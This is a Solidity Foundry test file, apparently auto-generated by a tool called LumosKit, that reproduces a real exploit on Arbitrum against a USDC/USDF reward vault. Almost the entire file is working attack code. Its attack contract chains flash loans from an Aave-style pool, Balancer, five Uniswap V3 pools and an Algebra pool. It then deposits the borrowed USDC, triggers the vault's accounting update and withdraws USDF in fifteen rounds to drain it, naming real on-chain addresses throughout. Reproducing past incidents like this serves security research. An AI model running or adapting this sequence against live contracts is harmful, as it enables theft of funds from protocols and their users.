// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.20;

import {LumosPoCBase} from "./LumosPoCBase.sol";

// @KeyInfo - Total Lost : 14.78K USD
// Attacker : 0xe2acec13c6d1aaca584f827a22f2e4a02131e39a
// Attack Contract : 0x43514743caa5a7d4a8b07f5d25fb242391bbc8da
// Vulnerable Contract : 0x43514743caa5a7d4a8b07f5d25fb242391bbc8da
// Attack Tx : 0x20db78913a51c3b3aece860ea142c240f3f8fa3b5bbf533a3d1d48eed857e10f
// Block : 465420021
// Chain : Arbitrum
// Analysis :
//
// @Reproduction
// Verdict : pass
// Economic Proof : unpriced_reproduction
// Reproduced Value : N/A
//
// @POC Author
// Generated by LumosKit

contract AttackTest is LumosPoCBase {
    address constant ATTACKER_EOA = LumosAddresses.attacker_eoa;
    address constant ATTACK_CONTRACT = LumosAddresses.attack_contract;
    uint256 constant FORK_BLOCK = 465420020;
    uint256 constant TX_TIMESTAMP = 1779434650;
    uint256 constant TX_BLOCK_NUMBER = 465420021;
    uint256 constant TX_VALUE = 0;

    function setUp() public {
        vm.createSelectFork(vm.envString("LUMOSKIT_FORK_ENDPOINT"), FORK_BLOCK);
        if (TX_TIMESTAMP != 0) vm.warp(TX_TIMESTAMP);
        if (TX_BLOCK_NUMBER != 0) vm.roll(TX_BLOCK_NUMBER);
    }

    function testPoC() public {
        _runExploit();
    }

    function _runExploit() internal {
        _fundCaller();
        vm.startPrank(ATTACKER_EOA, ATTACKER_EOA);
        _installAttackRuntime();
        OurAttack attack = OurAttack(payable(ATTACK_CONTRACT));
        _expectOutcome(address(attack));
        _snapProfit();
        _logBalances("Before exploit");
        attack.attack{value: TX_VALUE}();
        _logBalances("After exploit");
        vm.stopPrank();
        _assertProfit();
    }

    function _fundCaller() internal {
        if (TX_VALUE == 0) return;
        vm.deal(ATTACKER_EOA, TX_VALUE);
        vm.deal(address(this), TX_VALUE);
    }

    function _installAttackRuntime() internal {
        vm.etch(ATTACK_CONTRACT, type(OurAttack).runtimeCode);
    }

    function _expectOutcome(address attack) internal {
        _expectProfit(LumosAddresses.attack_contract, attack, LumosAddresses.USDF, "USDF", 1062879756);
        _expectProfit(LumosAddresses.InitializableImmutableAdminUpgradeabilityProxy_625E77, address(0), LumosAddresses.USDC_5CC8, "USDC", 222565517340);
        _expectProfit(LumosAddresses.attacker_eoa, address(0), LumosAddresses.USDC_5CC8, "USDC", 13707715574);
    }
}

contract OurAttack {
    mapping(uint256 => bool) private callbackSeen;

    function attack() external payable {
        borrowAaveUsdcAndStartNestedFlashLoans();
    }

    function executeOperation(address, uint256, uint256, address, bytes calldata) external returns (bool) {
        borrowBalancerUsdcAndApproveAaveRepayment();
        return true;
    }

    function receiveFlashLoan(address[] calldata, uint256[] calldata, uint256[] calldata, bytes calldata) external {
        borrowFirstUniswapPoolAndRepayBalancer();
    }

    function uniswapV3FlashCallback(uint256, uint256, bytes calldata) external {
        if (msg.sender == LumosAddresses.UniswapV3Pool_A443) {
            borrowSecondUniswapPoolAndRepayFirstPool();
            return;
        }
        if (msg.sender == LumosAddresses.UniswapV3Pool_393F) {
            borrowThirdUniswapPoolAndRepaySecondPool();
            return;
        }
        if (msg.sender == LumosAddresses.UniswapV3Pool) {
            borrowFourthUniswapPoolAndRepayThirdPool();
            return;
        }
        if (msg.sender == LumosAddresses.UniswapV3Pool_D5E6) {
            borrowFifthUniswapPoolAndRepayFourthPool();
            return;
        }
        if (msg.sender == LumosAddresses.UniswapV3Pool_9F74) {
            borrowAlgebraPoolAndRepayFifthPool();
            return;
        }
        borrowSecondUniswapPoolAndRepayFirstPool();
    }

    function algebraFlashCallback(uint256, uint256, bytes calldata) external {
        depositUsdcDrainUsdfAndRepayAlgebraPool();
    }

    function borrowAaveUsdcAndStartNestedFlashLoans() internal {
        snapshotProtocolLiquidity();
        IInitializableImmutableAdminUpgradeabilityProxy_794A61(LumosAddresses.InitializableImmutableAdminUpgradeabilityProxy_794A61).flashLoanSimple(address(this), LumosAddresses.USDC_5CC8, 222454290194, hex"", uint16(0));
        IERC20Like(LumosAddresses.USDC_5CC8).balanceOf(address(this));
        IERC20Like(LumosAddresses.USDC_5CC8).transfer(LumosAddresses.attacker_eoa, 13707715574);
    }

    function borrowBalancerUsdcAndApproveAaveRepayment() internal {
        markCallback(0);
        IVault_BA1222(LumosAddresses.Vault_BA1222).flashLoan(address(this), singleAddress(LumosAddresses.USDC_5CC8), singleUint(156746742625), hex"");
        approveIfNeeded(LumosAddresses.USDC_5CC8, LumosAddresses.InitializableImmutableAdminUpgradeabilityProxy_794A61, 222565517340);
    }

    function borrowFirstUniswapPoolAndRepayBalancer() internal {
        markCallback(1);
        IUniswapV3Pool_A443(LumosAddresses.UniswapV3Pool_A443).flash(address(this), 0, 325455260363, hex"");
        IERC20Like(LumosAddresses.USDC_5CC8).transfer(LumosAddresses.Vault_BA1222, 156746742625);
    }

    function borrowSecondUniswapPoolAndRepayFirstPool() internal {
        markCallback(2);
        IUniswapV3Pool_393F(LumosAddresses.UniswapV3Pool_393F).flash(address(this), 0, 72877030712, hex"");
        IERC20Like(LumosAddresses.USDC_5CC8).transfer(LumosAddresses.UniswapV3Pool_A443, 325617987994);
    }

    function borrowThirdUniswapPoolAndRepaySecondPool() internal {
        markCallback(3);
        IUniswapV3Pool(LumosAddresses.UniswapV3Pool).flash(address(this), 0, 16812367950, hex"");
        IERC20Like(LumosAddresses.USDC_5CC8).transfer(LumosAddresses.UniswapV3Pool_393F, 72884318416);
    }

    function borrowFourthUniswapPoolAndRepayThirdPool() internal {
        markCallback(4);
        IUniswapV3Pool_D5E6(LumosAddresses.UniswapV3Pool_D5E6).flash(address(this), 0, 27597033991, hex"");
        IERC20Like(LumosAddresses.USDC_5CC8).transfer(LumosAddresses.UniswapV3Pool, 16820774134);
    }

    function borrowFifthUniswapPoolAndRepayFourthPool() internal {
        markCallback(5);
        IUniswapV3Pool_9F74(LumosAddresses.UniswapV3Pool_9F74).flash(address(this), 0, 34922809708, hex"");
        IERC20Like(LumosAddresses.USDC_5CC8).transfer(LumosAddresses.UniswapV3Pool_D5E6, 27610832508);
    }

    function borrowAlgebraPoolAndRepayFifthPool() internal {
        markCallback(6);
        IAlgebraPool(LumosAddresses.AlgebraPool).flash(address(this), 0, 546394022415, hex"");
        IERC20Like(LumosAddresses.USDC_5CC8).transfer(LumosAddresses.UniswapV3Pool_9F74, 34926301989);
    }

    function depositUsdcDrainUsdfAndRepayAlgebraPool() internal {
        markCallback(7);
        uint256 usdcBalanceBeforeDeposit = IERC20Like(LumosAddresses.USDC_5CC8).balanceOf(address(this));
        IContract_80E1A9_2A09 rewardVault = IContract_80E1A9_2A09(LumosAddresses.A_80E1A9_2A09);
        rewardVault.currentPeriod();
        rewardVault.getPeriodOfCurrentEpoch();
        IERC20Like(LumosAddresses.USDC_5CC8).balanceOf(LumosAddresses.A_80E1A9_2A09);
        uint256 usdcDepositAmount = IERC20Like(LumosAddresses.USDC_5CC8).balanceOf(address(this));
        usdcBalanceBeforeDeposit;
        approveIfNeeded(LumosAddresses.USDC_5CC8, LumosAddresses.A_80E1A9_2A09, usdcDepositAmount);
        rewardVault.deposit(usdcDepositAmount);
        updateRewardVaultAccounting(rewardVault);
        withdrawUsdfInObservedRounds(rewardVault);
        rewardVault.getMaxWithdrawalAmount();
        IERC20Like(LumosAddresses.USDC_5CC8).balanceOf(LumosAddresses.A_80E1A9_2A09);
        IERC20Like(LumosAddresses.USDF).balanceOf(address(this));
        IERC20Like(LumosAddresses.USDC_5CC8).balanceOf(LumosAddresses.A_80E1A9_2A09);
        IERC20Like(LumosAddresses.USDC_5CC8).transfer(LumosAddresses.AlgebraPool, 546448661818);
    }

    function snapshotProtocolLiquidity() internal view {
        IERC20Like(LumosAddresses.USDC_5CC8).balanceOf(LumosAddresses.InitializableImmutableAdminUpgradeabilityProxy_625E77);
        IERC20Like(LumosAddresses.USDC_5CC8).balanceOf(LumosAddresses.Vault_BA1222);
        IERC20Like(LumosAddresses.USDC_5CC8).balanceOf(LumosAddresses.UniswapV3Pool_A443);
        IUniswapV3Pool_A443(LumosAddresses.UniswapV3Pool_A443).protocolFees();
        IERC20Like(LumosAddresses.USDC_5CC8).balanceOf(LumosAddresses.UniswapV3Pool_393F);
        IUniswapV3Pool_393F(LumosAddresses.UniswapV3Pool_393F).protocolFees();
        IERC20Like(LumosAddresses.USDC_5CC8).balanceOf(LumosAddresses.UniswapV3Pool);
        IUniswapV3Pool(LumosAddresses.UniswapV3Pool).protocolFees();
        IERC20Like(LumosAddresses.USDC_5CC8).balanceOf(LumosAddresses.UniswapV3Pool_D5E6);
        IUniswapV3Pool_D5E6(LumosAddresses.UniswapV3Pool_D5E6).protocolFees();
        IERC20Like(LumosAddresses.USDC_5CC8).balanceOf(LumosAddresses.UniswapV3Pool_9F74);
        IUniswapV3Pool_9F74(LumosAddresses.UniswapV3Pool_9F74).protocolFees();
        IERC20Like(LumosAddresses.USDC_5CC8).balanceOf(LumosAddresses.AlgebraPool);
    }

    function updateRewardVaultAccounting(IContract_80E1A9_2A09 rewardVault) internal {
        rewardVault.currentPeriod();
        rewardVault.compute();
        rewardVault.currentPeriod();
        rewardVault.compute();
        rewardVault.currentPeriod();
        rewardVault.getTokenPrice();
    }

    function withdrawUsdfInObservedRounds(IContract_80E1A9_2A09 rewardVault) internal {
        uint256[15] memory amounts = [
            uint256(232645092654),
            uint256(186116074124),
            uint256(148892859299),
            uint256(119114287439),
            uint256(95291429951),
            uint256(76233143961),
            uint256(60986515170),
            uint256(48789212136),
            uint256(39031369709),
            uint256(31225095767),
            uint256(24980076613),
            uint256(19984061291),
            uint256(15987249033),
            uint256(12789799226),
            uint256(3265096440)
        ];
        for (uint256 i = 0; i < amounts.length; i++) {
            rewardVault.getMaxWithdrawalAmount();
            IERC20Like(LumosAddresses.USDC_5CC8).balanceOf(LumosAddresses.A_80E1A9_2A09);
            IERC20Like(LumosAddresses.USDF).balanceOf(address(this));
            rewardVault.withdraw(amounts[i]);
        }
    }

    function approveIfNeeded(address token, address spender, uint256 amount) internal {
        if (token.code.length == 0) return;
        if (IERC20Like(token).allowance(address(this), spender) >= amount) return;
        IERC20Like(token).approve(spender, 0);
        IERC20Like(token).approve(spender, amount);
    }

    function markCallback(uint256 index) internal {
        callbackSeen[index] = true;
    }

    function singleAddress(address value) internal pure returns (address[] memory out) {
        out = new address[](1);
        out[0] = value;
    }

    function singleUint(uint256 value) internal pure returns (uint256[] memory out) {
        out = new uint256[](1);
        out[0] = value;
    }

    receive() external payable {}
}

interface IERC20Like {
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external;
    function transfer(address to, uint256 amount) external;
    function transferFrom(address from, address to, uint256 amount) external;
}

interface IERC721Like {
    function safeTransferFrom(address from, address to, uint256 tokenId) external;
}

interface IMulticallLike {
    function multicall(bytes[] calldata data) external returns (bytes[] memory results);
}

struct LumosAttackCall {
    address target;
    bytes data;
}

library LumosAddresses {
    address internal constant ZERO = address(0);
    address internal constant Vault_038C85 = 0x038C8535269E4AdC083Ba90388f15788174d7da7;
    address internal constant UniswapV3Pool = 0x13398E27a21Be1218b6900cbEDF677571df42A48;
    address internal constant USDC = 0x1eFB3f88Bc88f03FD1804A5C53b7141bbEf5dED8;
    address internal constant ArbitrumExtensionV2 = 0x3263CD783823d04a6B9819517E0E6840d37cA3F4;
    address internal constant attack_contract = 0x43514743CAA5a7d4a8b07F5d25Fb242391bBc8da;
    address internal constant A_580959_E21F = 0x58095979B412a366687cA05CbE85fF56241bE21f;
    address internal constant InitializableImmutableAdminUpgradeabilityProxy_625E77 = 0x625E7708f30cA75bfd92586e17077590C60eb4cD;
    address internal constant InitializableImmutableAdminUpgradeabilityProxy_794A61 = 0x794a61358D6845594F94dc1DB02A252b5b4814aD;
    address internal constant A_80E1A9_2A09 = 0x80e1a981285181686a3951B05dEd454734892a09;
    address internal constant WETH = 0x82aF49447D8a07e3bd95BD0d56f35241523fBab1;
    address internal constant A_86E721_57B3 = 0x86E721b43d4ECFa71119Dd38c0f938A75Fdb57B3;
    address internal constant RKA = 0x8b194bEae1d3e0788A1a35173978001ACDFba668;
    address internal constant UniswapV3Pool_393F = 0x8e295789c9465487074a65b1ae9Ce0351172393f;
    address internal constant USDF = 0xae48b7C8e096896E32D53F10d0Bf89f82ec7b987;
    address internal constant USDC_5831 = 0xaf88d065e77c8cC2239327C5EDb3A432268e5831;
    address internal constant Vault_BA1222 = 0xBA12222222228d8Ba445958a75a0704d566BF2C8;
    address internal constant UniswapV3Pool_A443 = 0xC31E54c7a869B9FcBEcc14363CF510d1c41fa443;
    address internal constant AlgebraPool = 0xc86Eb7B85807020b4548EE05B54bfC956eEbbfCD;
    address internal constant UniswapV3Pool_D5E6 = 0xd37Af656Abf91c7f548FfFC0133175b5e4d3d5e6;
    address internal constant A_D8C48C_4C47 = 0xd8c48C19413727aCB62e051acE11DAf31a754C47;
    address internal constant DAI = 0xDA10009cBd5D07dd0CeCc66161FC93D7c9000da1;
    address internal constant attacker_eoa = 0xE2AceC13c6d1AAcA584F827a22F2e4A02131e39a;
    address internal constant UniswapV3Pool_9F74 = 0xF0428617433652c9dc6D1093A42AdFbF30D29f74;
    address internal constant USDF_C25F = 0xf8a13864378C8eB6883A6c98B5B23eA068d8c25F;
    address internal constant USD_0 = 0xFd086bC7CD5C481DCC9C85ebE478A1C0b69FCbb9;
    address internal constant USDC_5CC8 = 0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8;
}

interface IAlgebraPool {
    function flash(address, uint256, uint256, bytes calldata) external;
}

interface IContract_80E1A9_2A09 {
    function compute() external;
    function currentPeriod() external view returns (uint256);
    function deposit(uint256) external;
    function getMaxWithdrawalAmount() external view returns (uint256);
    function getPeriodOfCurrentEpoch() external view returns (uint256);
    function getTokenPrice() external view returns (uint256);
    function withdraw(uint256) external;
}

interface IInitializableImmutableAdminUpgradeabilityProxy_794A61 {
    function flashLoanSimple(address, address, uint256, bytes calldata, uint16) external;
}

interface IUniswapV3Pool {
    function flash(address, uint256, uint256, bytes calldata) external;
    function protocolFees() external view;
}

interface IUniswapV3Pool_393F {
    function flash(address, uint256, uint256, bytes calldata) external;
    function protocolFees() external view;
}

interface IUniswapV3Pool_9F74 {
    function flash(address, uint256, uint256, bytes calldata) external;
    function protocolFees() external view;
}

interface IUniswapV3Pool_A443 {
    function flash(address, uint256, uint256, bytes calldata) external;
    function protocolFees() external view;
}

interface IUniswapV3Pool_D5E6 {
    function flash(address, uint256, uint256, bytes calldata) external;
    function protocolFees() external view;
}

interface IVault_BA1222 {
    function flashLoan(address, address[] calldata, uint256[] calldata, bytes calldata) external;
}
